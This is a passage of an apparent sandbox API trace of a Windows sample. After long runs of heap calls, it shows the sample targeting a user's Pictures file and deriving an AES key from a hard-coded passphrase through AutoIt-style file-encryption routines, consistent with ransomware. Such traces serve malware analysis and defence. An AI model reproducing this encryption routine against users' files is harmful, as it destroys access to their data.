0x43ca268 [0088.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0088.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0088.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0088.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0088.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0088.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0088.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0088.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0088.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0088.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0088.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0088.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0088.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0088.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0088.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0088.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0088.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0088.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0088.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0088.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0088.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0088.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0088.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0088.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0088.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0088.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0088.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0088.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0088.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0088.219] FreeLibrary (hLibModule=0x772d0000) returned 1 [0088.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0088.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0088.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0088.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0088.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0088.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0088.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0088.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0088.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0088.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0088.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ef0 | out: hHeap=0x1780000) returned 1 [0088.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e90 | out: hHeap=0x1780000) returned 1 [0088.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0088.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f08 | out: hHeap=0x1780000) returned 1 [0088.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0088.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0088.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0088.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0088.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0088.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0088.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0088.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0088.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0088.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0088.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0088.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0088.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0088.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0088.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0088.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0088.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0088.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0088.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0088.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0088.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0088.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0088.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0088.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0088.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0088.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0088.220] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0088.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eab80 | out: hHeap=0x1780000) returned 1 [0088.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0088.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0088.220] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0088.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0088.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0088.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0088.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0088.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0088.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0088.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0088.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0088.271] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0088.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0088.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0088.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0088.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0088.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0088.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0088.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0088.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca160 | out: hHeap=0x1780000) returned 1 [0088.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0088.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0088.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0088.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0088.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0088.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4a0 | out: hHeap=0x1780000) returned 1 [0088.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2140 | out: hHeap=0x1780000) returned 1 [0088.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf450 | out: hHeap=0x1780000) returned 1 [0088.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e18 | out: hHeap=0x1780000) returned 1 [0088.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0088.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21a0 | out: hHeap=0x1780000) returned 1 [0088.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0088.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e30 | out: hHeap=0x1780000) returned 1 [0088.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391bd0 | out: hHeap=0x1780000) returned 1 [0088.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0088.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0088.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ba8 | out: hHeap=0x1780000) returned 1 [0088.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0088.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0088.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0088.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0d0 | out: hHeap=0x1780000) returned 1 [0088.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0088.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0088.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0088.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0088.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431de60 | out: hHeap=0x1780000) returned 1 [0088.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0088.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0088.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0088.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0088.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0088.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0088.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0088.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0088.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0088.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0088.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9c68 | out: hHeap=0x1780000) returned 1 [0088.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0088.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca178 | out: hHeap=0x1780000) returned 1 [0088.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0088.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0088.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0088.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b90 | out: hHeap=0x1780000) returned 1 [0088.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0088.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2290 | out: hHeap=0x1780000) returned 1 [0088.273] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0088.274] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.274] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43c9bc0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0088.274] CloseHandle (hObject=0x298) returned 1 [0088.274] FreeLibrary (hLibModule=0x772d0000) returned 1 [0088.274] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0088.274] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\GbOsv53gLsdhP15shLc.jpg", lpFindFileData=0x144ed28 | out: lpFindFileData=0x144ed28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4964680, ftCreationTime.dwHighDateTime=0x1d5eda8, ftLastAccessTime.dwLowDateTime=0xa9998330, ftLastAccessTime.dwHighDateTime=0x1d5ec95, ftLastWriteTime.dwLowDateTime=0xa9998330, ftLastWriteTime.dwHighDateTime=0x1d5ec95, nFileSizeHigh=0x0, nFileSizeLow=0xf65b, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="GbOsv53gLsdhP15shLc.jpg", cAlternateFileName="GBOSV5~1.JPG")) returned 0x41ac640 [0088.274] FindClose (in: hFindFile=0x41ac640 | out: hFindFile=0x41ac640) returned 1 [0088.274] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0088.274] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0088.275] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0088.275] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0088.275] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0088.275] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0088.275] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796d88, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0088.275] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0088.275] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796e48, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0088.275] CryptAcquireContextA (in: phProv=0x144ea08, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144ea08*=0x41a5360) returned 1 [0088.316] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0088.316] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0088.316] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0088.316] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0088.316] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0088.316] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0088.316] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0088.316] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0088.316] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0088.316] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0088.316] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43ca5b0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0088.316] CryptCreateHash (in: hProv=0x41a5360, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e778 | out: phHash=0x144e778) returned 1 [0088.316] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0088.316] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e28a8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0088.316] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0088.316] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0088.316] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2728, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0088.316] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0088.317] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0088.317] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0088.317] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43ca538, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0088.317] CryptHashData (hHash=0x41ac780, pbData=0x17e2ae8, dwDataLen=0x22, dwFlags=0x1) returned 1 [0088.317] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0088.317] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0088.317] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0088.317] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0088.317] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43ca700, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0088.317] CryptDeriveKey (in: hProv=0x41a5360, Algid=0x6610, hBaseData=0x41ac780, dwFlags=0x1, phKey=0x144e778 | out: phKey=0x144e778*=0x41ac600) returned 1 [0088.317] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0088.317] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0088.317] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0088.317] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1797108, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0088.317] CryptDestroyHash (hHash=0x41ac780) returned 1 [0088.317] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0088.317] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43eab80 [0088.317] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0088.317] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0088.317] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0088.318] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0088.318] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0088.318] 